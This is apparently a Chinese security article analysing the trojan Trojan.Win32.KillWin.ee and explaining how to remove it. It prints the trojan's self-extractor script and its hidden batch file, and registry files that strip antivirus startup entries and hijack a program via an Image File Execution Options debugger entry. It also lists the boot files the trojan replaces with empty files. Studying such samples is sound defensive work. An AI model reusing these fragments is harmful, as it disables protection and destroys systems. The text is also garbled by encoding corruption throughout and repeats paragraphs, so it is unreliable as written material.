以下的文章主要向大家講述的是對(duì)清除Trojan.Win32.KillWin.ee病毒的正確分析，病毒日新月異發(fā)展的今天，偽裝以及新型變種也越來越瘋狂，面對(duì)如此情況，很多網(wǎng)民是只能一次又一次的進(jìn)行系統(tǒng)還原或者是重裝系統(tǒng)。

而安全軟件在此時(shí)卻顯得力不從心，因?yàn)楹芏嗖《灸抉R在發(fā)作前都開始解除安軟的保護(hù)功能，這不新出現(xiàn)的Trojan.Win32.KillWin.ee也具備此種功能。

病毒日新月異的今天，越來越多的偽裝及新型變種是一天接一天的瘋狂，面對(duì)如此情況，很多網(wǎng)民是只能一次又一次的進(jìn)行系統(tǒng)還原或者是重裝系統(tǒng)。而安全軟件在此時(shí)卻顯得力不從心，因?yàn)楹芏嗖《灸抉R在發(fā)作前都開始解除安軟的保護(hù)功能，這不新出現(xiàn)的Trojan.Win32.KillWin.ee也具備此種功能。

病毒分析

該病毒名為Trojan.Win32.KillWin.ee，文件雖然只有小小的169 KB(173,614 字節(jié))，但其威力卻不容小視。病毒為WINRAR自解壓縮包格式，可通過修改自身圖標(biāo)為卡卡助手的標(biāo)識(shí)來進(jìn)行偽裝自身。當(dāng)病毒進(jìn)駐到用戶計(jì)算機(jī)后，會(huì)釋放BAT和REG命令的執(zhí)行文件，并利用命令方式刪除用戶計(jì)算機(jī)中的卡卡助手啟動(dòng)項(xiàng)，禁止其真實(shí)的程序啟動(dòng)，然后通過劫持卡卡的主程序并將其指向病毒主體gameover.exe程序。

該程序在使用自動(dòng)解壓縮命令解壓自身后開始進(jìn)行系統(tǒng)破壞，其自解壓命令如下：

Path=%SystemRoot%\system32\

SavePath

Setup=hidecmd.exe kv.bat

Silent=1

Overwrite=1

執(zhí)行hidecmd.exe(隱藏執(zhí)行BAT)用參數(shù)調(diào)用kv.bat隱藏執(zhí)行。

kv.bat的內(nèi)容為：

@echo off

%SystemRoot%\regedit /s kaka.reg

%SystemRoot%\regedit /s gameover.reg

Exit

病毒修改注冊(cè)表

在結(jié)束上述命令后，病毒源體開始接著導(dǎo)入到系統(tǒng)中兩個(gè)REG文件，來修改注冊(cè)表，其內(nèi)容如下：

kaka.reg：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

"KKDelay"="C:\\Program Files\\Rising\\AntiSpyware\\RunOnce.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"runeip"="\"C:\\Program Files\\Rising\\AntiSpyware\\runiep.exe\" /startup"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]

"Installed"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]

"Installed"="1"

"NoChange"="1"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]

"Installed"="1"

病毒刪除卡卡助手

到此時(shí)病毒依然沒有停手，其開始查找并刪除卡卡助手的相關(guān)啟動(dòng)，其內(nèi)容如下：

gameover.reg：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe]

"Debugger"="C:\\winnt\\system32\\gameover.exe"

從而進(jìn)行劫持卡卡主程序并將其指向釋放的病毒。

小提示：從這里%SystemRoot%\system32\可以看出作者針對(duì)的是WIN2K系列，因?yàn)閯偛诺腤INRAR釋放腳本使用的是環(huán)境變量，只有在WIN2K系列操作平臺(tái)中才是WINNT文件夾，而在XP里是WINDOWS\system32\，所以這個(gè)劫持指向無效。

重要注釋

%System32%是一個(gè)可變路徑，病毒通過查詢操作系統(tǒng)來決定當(dāng)前System文件夾的位置。Windows2000/NT中默認(rèn)的安裝路徑是C:\Winnt\System32，windows95/98/me中默認(rèn)的安裝路徑是C:\Windows\System，windowsXP中默認(rèn)的安裝路徑是C:\Windows\System32。

%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 當(dāng)前用戶TEMP緩存變量

%Windir%\ WINDODWS所在目錄

%DriveLetter%\ 邏輯驅(qū)動(dòng)器根目錄

%ProgramFiles%\ 系統(tǒng)程序默認(rèn)安裝目錄

%HomeDrive% = C:\ 當(dāng)前啟動(dòng)的系統(tǒng)的所在分區(qū)

%Documents and Settings%\ 當(dāng)前用戶文檔根目錄

破壞系統(tǒng)的gameover.exe

病毒在對(duì)卡卡劫持后，開始進(jìn)行下一步活動(dòng)，在系統(tǒng)中放入gameover.exe程序進(jìn)行系統(tǒng)破壞。其實(shí)gameover.exe也是一個(gè)自解壓縮包，內(nèi)含自解壓腳本命令如下：

Path=C:\

SavePath

Silent=1

Overwrite=1

釋放了0字節(jié)的同名空文件替換以下系統(tǒng)文件，破壞系統(tǒng)啟動(dòng)：

AUTOEXEC.BAT

boot.ini

bootfont.bin

CONFIG.SYS

IO.SYS

MSDOS.SYS

NTDETECT.COM

Ntldr

清除病毒

普通用戶可通過系統(tǒng)鏡像還原實(shí)現(xiàn)系統(tǒng)恢復(fù)，而對(duì)于有一定基礎(chǔ)的網(wǎng)民來說，可以系統(tǒng)光盤中復(fù)制上述的系統(tǒng)文件進(jìn)行修復(fù)操作系統(tǒng)平臺(tái)。在查找文件時(shí)可以用DIR命令來查找其相關(guān)位置，如：首先進(jìn)入光盤的盤符，然后輸入：DIR Autoexe.bat，系統(tǒng)會(huì)將此路徑下的Autoexe.bat文件的位置顯示出來，然后再進(jìn)行復(fù)制文件，其命令格式如下：

COPY_源路徑_目標(biāo)路徑(其中_為空格)，比如：“COPY_X:\autoexe.bat_C:\”就表示將X盤根目錄下的Autoexe.bat文件拷貝到C盤根目錄下。

然后刪除系統(tǒng)目錄%SystemRoot%\system32\下的gameover.exe文件即可，最后進(jìn)行殺毒軟件的升級(jí)與全盤殺毒，以防另類感染。

編者按：病毒雖然有其入駐破壞之道，但只要掌握其原理，在了解其運(yùn)行過程與所添加的注冊(cè)表項(xiàng)目后，即可輕而易舉的將其清除出系統(tǒng)之外，還平臺(tái)一個(gè)安全的環(huán)境。

【編輯推薦】

1. IPTV會(huì)否是分眾購對(duì)象
2. 我國IPTV研究目全球領(lǐng)先
3. 3G與IPTV是發(fā)展大方向
4. 我國IPTV研究目全球領(lǐng)先
5. 3G與IPTV是發(fā)展大方向